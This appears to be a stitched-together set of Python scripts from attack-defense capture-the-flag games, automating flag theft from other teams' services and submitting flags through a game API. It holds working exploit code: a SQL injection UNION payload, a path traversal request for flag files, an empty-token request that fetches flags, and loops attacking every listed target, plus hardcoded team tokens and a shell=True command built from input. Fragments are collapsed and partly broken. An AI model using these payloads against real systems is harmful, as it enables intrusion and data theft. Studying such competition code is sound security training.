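class PCTFAPI():
    """Thin wrapper around the game client's ``Team`` object for one service.

    Every method delegates to ``self.team``; only ``getFLG`` talks to a target
    host directly.
    """

    # A real one-element tuple: ``('team')`` is just a parenthesised string.
    __slots__ = ('team',)

    def __init__(self, game_url, team_token):
        """Create the underlying ``Team`` client from the game URL and team token."""
        self.team = Team(game_url, team_token)

    def getServiceNames(self):
        """Return the ``service_id`` of every entry in the team's service list."""
        return [service['service_id'] for service in self.team.get_service_list()]

    def getTargets(self, service):
        """Return whatever ``Team.get_targets`` reports for ``service``."""
        return self.team.get_targets(service)

    def getFLG(self, hostname, flagID):
        """Query ``/kid`` and then ``/find`` on port 10003 and return the flag token.

        The ``last`` query parameter of the first request carries the SQL
        injection string built in ``sql_injection``. The third whitespace-separated
        token of that response is sent as ``kid`` to ``/find``, and the sixth
        token of the second response is returned.

        Args:
            hostname: host name or address of the target service.
            flagID: flag id as a string; it is concatenated into the payload
                before the ``try`` block, so a non-string raises ``TypeError``.

        Returns:
            The extracted token, or ``None`` if a request or the parsing fails.
        """
        kid_url = 'http://' + hostname + ':10003/kid'
        print('Send request to: ' + kid_url)
        # NOTE(review): this value only has an effect if the service builds its query by
        # string concatenation (presumably a LIKE pattern, given the leading "%'");
        # bound parameters on the service side would make it inert.
        sql_injection = "%' UNION SELECT description AS data from parties where id=" + flagID + "; --"
        payload = {'first': 'Hong', 'last': sql_injection, 'age': 30}
        try:
            r = requests.get(kid_url, params=payload)
            res = r.text
            kid_id = res.split()[2]
            print(res)
            print(kid_id)
            find_url = 'http://' + hostname + ':10003/find'
            print('Send request to: ' + find_url)
            find_params = {'kid': kid_id}
            find_r = requests.get(find_url, params=find_params)
            find_res = find_r.text
            flag = find_res.split()[5]
            print(find_res)
            print(flag)
            return flag
        except Exception:
            # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
            # SystemExit and made the loop around this call hard to stop.
            return None

    def submitFlag(self, flags):
        """Submit one flag or a list of flags and return the per-flag status list.

        A single flag is wrapped in a list before submission. Each flag is
        printed next to its status.
        """
        if not isinstance(flags, list):
            flags = [flags]
        status = self.team.submit_flag(flags)
        # zip() instead of flags[i]: a status list longer than the flag list
        # no longer raises IndexError while printing.
        for flag, s in zip(flags, status):
            print("Flag %s submission status: %s" % (flag, s))
        return status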
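class PCTFAPI():
    """Thin wrapper around the game client's ``Team`` object.

    ``getFlag`` is still a stub that returns a fixed string.
    """

    # A real one-element tuple: ``('team')`` is just a parenthesised string.
    __slots__ = ('team',)

    def __init__(self, game_url, team_token):
        """Create the underlying ``Team`` client from the game URL and team token."""
        self.team = Team(game_url, team_token)

    def getServiceNames(self):
        """Return the ``service_id`` of every entry in the team's service list."""
        return [service['service_id'] for service in self.team.get_service_list()]

    def getTargets(self, service):
        """Return whatever ``Team.get_targets`` reports for ``service``."""
        return self.team.get_targets(service)

    def getFlag(self):
        """Return a placeholder value; no retrieval logic exists yet."""
        # TODO: implement the getFlag logic.
        flag = 'dummy flag'
        return flag

    def submitFlag(self, flags):
        """Submit one flag or a list of flags and return the per-flag status list.

        A single flag is wrapped in a list before submission. Each flag is
        printed next to its status.
        """
        if not isinstance(flags, list):
            flags = [flags]
        status = self.team.submit_flag(flags)
        # zip() instead of flags[i]: a status list longer than the flag list
        # no longer raises IndexError while printing.
        for flag, s in zip(flags, status):
            print("Flag %s submission status: %s" % (flag, s))
        return status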
# NOTE(review): excerpt from the body of a per-service loop (`service` is bound outside it).
# The indentation is reconstructed from a collapsed listing, so the nesting of the last two
# statements is inferred.
if service['service_name'] not in service_flag_ids:
    service_flag_ids[service['service_name']] = set()
targets = team.get_targets(service['service_id'])
for target in targets:
    # Only targets whose team name starts with "fos_" are processed.
    if not target["team_name"].startswith("fos_"):
        continue
    flag_id = target['flag_id']
    ip = socket.gethostbyname(target['hostname'])
    # One fixed address is always skipped (presumably the operator's own host; confirm).
    if ip == "10.9.4.4":
        continue
    port = target['port']
    print("ip:", ip, ", port:", port, ", flag_id:", flag_id)
    if flag_id in service_flag_ids[service['service_name']]:
        print("Skipping... already processed this flag_id.")
        continue
    try:
        conn = remote(ip, port, timeout=30)
        # NOTE(review): re-assigned on every iteration and process-wide in pwntools; at
        # "debug" level all traffic, including any flag received, is written to the log.
        context.log_level = "debug"
        flag = attack_functions[service['service_id']](conn, flag_id)
        print("flag:", flag)
        # NOTE(review): only reached on success; if the call above raises, the socket is
        # left open. A try/finally (or `with`) around the connection would close it.
        conn.close()
        result = team.submit_flag(flag)
        print(result)
    except Exception as e:
        # Every failure, not only connection errors, is reported with this message.
        print("Error connecting to", target['team_name'], target['hostname'], ip, port)
        print(e)
    # The flag_id is recorded as processed whether or not the attempt succeeded.
    service_flag_ids[service['service_name']].add(flag_id)
    time.sleep(10) # pause between targets: DoS is against the rules
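class ProjectCTFAPI():
    """Simple wrapper class around the game client's ``Team`` object.

    See client.py for more methods supported by ``self.team``. When ``debug``
    is true, each call also prints what it retrieved.
    """

    __slots__ = ('team', 'debug')

    def __init__(self, gameIp, teamToken):
        """Create the ``Team`` client, which is the entry point into the API."""
        self.debug = False
        self.team = Team(gameIp, teamToken)

    def getServices(self):
        """Return all of the service ids in the game."""
        ids = []
        services = self.team.get_service_list()
        if self.debug:
            print("~" * 5 + " Service List " + "~" * 5)
        for s in services:
            ids.append(s['service_id'])
            if self.debug:
                print("Service %s: %s\n\t'%s'" % (s['service_id'], s['service_name'], s['description']))
        return ids

    def getTargets(self, service):
        """Return the list of targets (ports, ips, flag ids) for the given service id."""
        targets = self.team.get_targets(service)
        if self.debug:
            print("~" * 5 + " Targets for service %s " % service + "~" * 5)
            for t in targets:
                for key in ['hostname', 'port', 'flag_id', 'team_name']:
                    print("%10s : %s" % (key, t[key]))
                print("\n")
        return targets

    def submitFlag(self, oneOrMoreFlags):
        """Submit an individual flag or a list of flags and return the status list.

        Accepts "FLGxxxxxxxx" or ["FLGxxxxxxxxx", "FLGyyyyyyyy", ...]; a single
        flag is wrapped in a list before submission.
        """
        if not isinstance(oneOrMoreFlags, list):
            oneOrMoreFlags = [oneOrMoreFlags]
        status = self.team.submit_flag(oneOrMoreFlags)
        if self.debug:
            # zip() instead of indexing: a status list longer than the flag
            # list no longer raises IndexError while printing.
            for flag, s in zip(oneOrMoreFlags, status):
                print("Flag %s submission status: %s" % (flag, s))
        return status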
if not enabled: continue print("Attacking team {0} on service {1} using attack {2}... ". format(team_name, svcid, i), end="", flush=True) flag = svcmap[svcid][i](hostname, port, flag_id) if flag is not None: print("Got flag {0}!".format(flag)) flags.add((team_name, flag)) break # don't try later attacks if those are enabled else: print("Attack failed!") if flags: teamlist = list(flags) flaglist = [str(f[1]) for f in teamlist] print(flaglist) results = team.submit_flag(flaglist) resobj = {} for i, (t, flag) in enumerate(teamlist): resobj[t] = (flag, results[i]) print("Submitting flags:", resobj) else: print("No flags found! Please investigate.") # wait for next tick info = team.get_tick_info() wait = int(info["approximate_seconds_left"]) print("Next tick is in approximately {0} seconds.".format(wait))
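class PCTFAPI():
    """Thin wrapper around the game client's ``Team`` object for one service.

    Every method delegates to ``self.team``; only ``getFLG`` opens a
    connection to a target host.
    """

    # A real one-element tuple: ``('team')`` is just a parenthesised string.
    __slots__ = ('team',)

    def __init__(self, game_url, team_token):
        """Create the underlying ``Team`` client from the game URL and team token."""
        self.team = Team(game_url, team_token)

    def getServiceNames(self):
        """Return the ``service_id`` of every entry in the team's service list."""
        return [service['service_id'] for service in self.team.get_service_list()]

    def getTargets(self, service):
        """Return whatever ``Team.get_targets`` reports for ``service``."""
        return self.team.get_targets(service)

    def getFLG(self, hostname, flagID):
        """Connect to port 10001, send three lines and search the reply for a flag.

        The lines sent are ``'2'``, ``flagID`` and ``'*'``. The reply is
        decoded as UTF-8 and searched for ``FLG`` followed by 13 alphanumeric
        characters.

        Returns:
            The matched flag string, or ``None`` when the connection fails, the
            reply cannot be decoded, or no flag is found.
        """
        try:
            r = remote(hostname, 10001)
        except Exception:
            # Was a bare ``except:``, which also swallowed KeyboardInterrupt.
            print(hostname + ' is down ')
            return None
        try:
            r.sendline('2')
            r.sendline(flagID)
            r.sendline('*')
            rl = r.recvall(timeout=1)
        finally:
            # Close on every path; the original leaked the connection when the
            # reply could not be decoded or an exchange step raised.
            r.close()
        try:
            decoded_str = rl.decode('utf-8')
            print(decoded_str)
        except Exception:
            print('bad response')
            return None
        m = re.search('FLG[0-9A-Za-z]{13}', decoded_str)
        if m is None:
            return None
        FLG = m.group(0)
        print('captured the flag')
        print(FLG)
        return FLG

    def submitFlag(self, flags):
        """Submit one flag or a list of flags and return the per-flag status list.

        A single flag is wrapped in a list before submission. Each flag is
        printed next to its status.
        """
        if not isinstance(flags, list):
            flags = [flags]
        status = self.team.submit_flag(flags)
        # zip() instead of flags[i]: a status list longer than the flag list
        # no longer raises IndexError while printing.
        for flag, s in zip(flags, status):
            print("Flag %s submission status: %s" % (flag, s))
        return status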
continue
# NOTE(review): the excerpt starts inside a loop; the `continue` above ends a guard that is
# not shown. Indentation is reconstructed from a collapsed listing, and how the statements
# below nest relative to that loop cannot be recovered from here.
command = 'timeout 5 python exploits/' + sys.argv[3] + '.py '
command += '172.31.129.' + target['hostname'][-1] + ' ' + str(
    target['port']) + ' ' + str(target['flag_id'])
try:
    # NOTE(review): shell=True on a concatenated string. `port` and `flag_id` come from the
    # target record and sys.argv[3] from the command line; shell metacharacters in any of
    # them would be interpreted by the local shell on the machine running this script.
    # Passing an argument list without shell=True removes that risk.
    flag = subprocess.check_output(command, shell=True)
except CalledProcessError:
    log("Failed on: " + str(target['team_name']))
    continue
log(target['hostname'] + ':' + str(target['port']) + ' - ' + flag)
# Output containing 'FLG' is kept as a flag; anything else is recorded as a failure.
if 'FLG' in flag:
    flags.append(flag.strip())
else:
    fails.append((target, flag.strip()))
# Submit flags
results = t.submit_flag(flags)
for result in results:
    log(result)
    # assert(result == 'correct')
# Python 2 print statements: each failed target is followed by the output it produced.
if fails:
    for fail in fails:
        print "----------------------"
        print "Failed exploits"
        print "----------------------"
        print fail[0]
        print fail[1]
        print "----------------------"
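import json

import requests
from swpag_client import Team

# NOTE(review): the game URL and the team token are literals in this file. Anyone who can
# read it can act as the team; treat the token as exposed and load it from the environment
# or a secrets store instead of committing it.
team = Team('http://34.211.129.130', 'WOfdkzdhsZEIlPEIai49')
targets = team.get_targets(2)
flags = []
for target in targets:
    print(target)
    # The `page` parameter points one directory up, at the target's <flag_id>.json file.
    # NOTE(review): presumably the service joins `page` onto a base directory without
    # normalising it; rejecting path separators and ".." on the service side closes this.
    url = f'http://{target["hostname"]}:{target["port"]}/?page=../append/{target["flag_id"]}.json'
    print(f'request url: {url}')
    resp = requests.get(url)
    print(f'response: {resp.text}')
    if "password" in resp.text:
        try:
            content = json.loads(resp.text)
            print(f'content: {content}')
            flags.append(content['password'])
            # NOTE(review): 'password' is collected above but 'message' is what gets
            # submitted; confirm which field holds the flag.
            team.submit_flag([content['message']])
        except Exception as e:
            # Report the cause; the original bound `e` and then discarded it.
            print(f'some error occurred: {e}')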
from swpag_client import Team

# One manual submission through the team interface.
# NOTE(review): the team token is a literal in this file; anyone who can read the file can
# submit as the team. Prefer reading it from the environment or a secrets store.
t = Team("http://teaminterface.ictf.love/", "W7PMqeQCuYjVeL03UnV3")

# Placeholder flag value; replace it with a captured flag before running.
flags = ['FLGxxxxxxxxxxxxx']

submission_status = t.submit_flag(flags)
print(submission_status)
# NOTE(review): excerpt from the body of a per-service loop (`service` is bound outside it).
# The indentation is reconstructed from a collapsed listing, so the nesting of the trailing
# statements is inferred.
targets = team.get_targets(service['service_id'])
flag_list = []
for target in targets:
    flag_id = target['flag_id']
    ip = team_ip(target['hostname'])
    port = target['port']
    # Each flag_id is attempted at most once per service.
    if flag_id not in service_flag_ids[service['service_name']]:
        try:
            # NOTE(review): the connection is bound to `coinn` while the lines below use
            # `conn`. Unless a `conn` exists in an outer scope, the first use raises
            # NameError, which the broad except below reports as a connection error.
            coinn = remote(ip, port, timeout=1)
            # exploitation happens here
            # NOTE(review): the request carries an empty "token"; presumably the service
            # does not verify it. Checking the token on the service side is the fix.
            conn.sendline(
                '{"service": "flag", "op": "getflag", "id": "%s", "token": ""}' % flag_id)
            flag = json.loads(conn.recv().strip())['flag']
            # Only reached on success; an exception above leaves the socket open.
            conn.close()
            flag_list.append(flag)
            print("HACKED")
        except Exception as e:
            print("Error connecting to", target['team_name'], target['hostname'], ip, port)
            print(e)
        # The flag_id is recorded as processed whether or not the attempt succeeded.
        service_flag_ids[service['service_name']].add(flag_id)
result = team.submit_flag(flag_list)
# Python 2 print statement, unlike the print() calls above.
print result
time.sleep(10) # pause between rounds: DoS is against the rules
def validate_flag(self, args):
    """Submit ``args['flag']`` through a new ``Team`` client and return the result.

    A fresh client is built on every call with no game URL (``None``) and the
    literal ``"API_KEY"``, which looks like a placeholder for the real key
    (TODO confirm).

    Args:
        args: mapping that must contain a ``'flag'`` entry; a missing key
            raises ``KeyError``.

    Returns:
        Whatever ``Team.submit_flag`` returns for the one-element flag list.
    """
    client = Team(None, "API_KEY")
    candidate = args['flag']
    return client.submit_flag([candidate])
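class ProjectCTFAPI():
    """Simple wrapper class around the game client's ``Team`` object.

    See client.py for more methods supported by ``self.team``. When ``debug``
    is true, each call also prints what it retrieved.
    """

    __slots__ = ('team', 'debug')

    def __init__(self, gameIp, teamToken):
        """Create the ``Team`` client, which is the entry point into the API."""
        self.debug = False
        self.team = Team(gameIp, teamToken)

    def getServices(self):
        """Return all of the service ids in the game."""
        ids = []
        services = self.team.get_service_list()
        if self.debug:
            print("~" * 5 + " Service List " + "~" * 5)
        for s in services:
            ids.append(s['service_id'])
            if self.debug:
                print("Service %s: %s\n\t'%s'" % (s['service_id'], s['service_name'], s['description']))
        return ids

    def getTargets(self, service):
        """Return the list of targets (ports, ips, flag ids) for the given service id."""
        targets = self.team.get_targets(service)
        if self.debug:
            print("~" * 5 + " Targets for service %s " % service + "~" * 5)
            for t in targets:
                for key in ['hostname', 'port', 'flag_id', 'team_name']:
                    print("%10s : %s" % (key, t[key]))
                print("\n")
        return targets

    def submitFlag(self, oneOrMoreFlags):
        """Submit an individual flag or a list of flags and return the status list.

        Accepts "FLGxxxxxxxx" or ["FLGxxxxxxxxx", "FLGyyyyyyyy", ...]; a single
        flag is wrapped in a list before submission.
        """
        if not isinstance(oneOrMoreFlags, list):
            oneOrMoreFlags = [oneOrMoreFlags]
        status = self.team.submit_flag(oneOrMoreFlags)
        if self.debug:
            # zip() instead of indexing: a status list longer than the flag
            # list no longer raises IndexError while printing.
            for flag, s in zip(oneOrMoreFlags, status):
                print("Flag %s submission status: %s" % (flag, s))
        return status

    def getFLG(self, hostname, flagID):
        """Connect to port 20003, send three lines and search the reply for a flag.

        The lines sent are ``'2'``, ``flagID`` and ``'*'`` (the interaction for
        the Backup service of CTF3; change the port and the interaction for
        other services). The reply is searched for ``FLG`` followed by 13
        alphanumeric characters.

        Returns:
            The matched flag string, or ``None`` when nothing matches, which
            the original comments attribute to a patched service.
        """
        # Please change port id accordingly
        r = remote(hostname, 20003)
        try:
            r.sendline('2')
            r.sendline(flagID)
            r.sendline('*')
            # Receive data from the service
            rl = r.recvall(timeout=1)
        finally:
            # Close on every path; previously an error during the exchange
            # left the connection open.
            r.close()
        # NOTE(review): the pattern is a str; if recvall() returns bytes (Python 3)
        # re.search raises TypeError, so decode first. TODO confirm interpreter.
        m = re.search('FLG[0-9A-Za-z]{13}', rl)
        if m is None:
            return None
        FLG = m.group(0)
        # print() call instead of the Python 2 print statement, matching the
        # rest of the class.
        print(FLG)
        return FLG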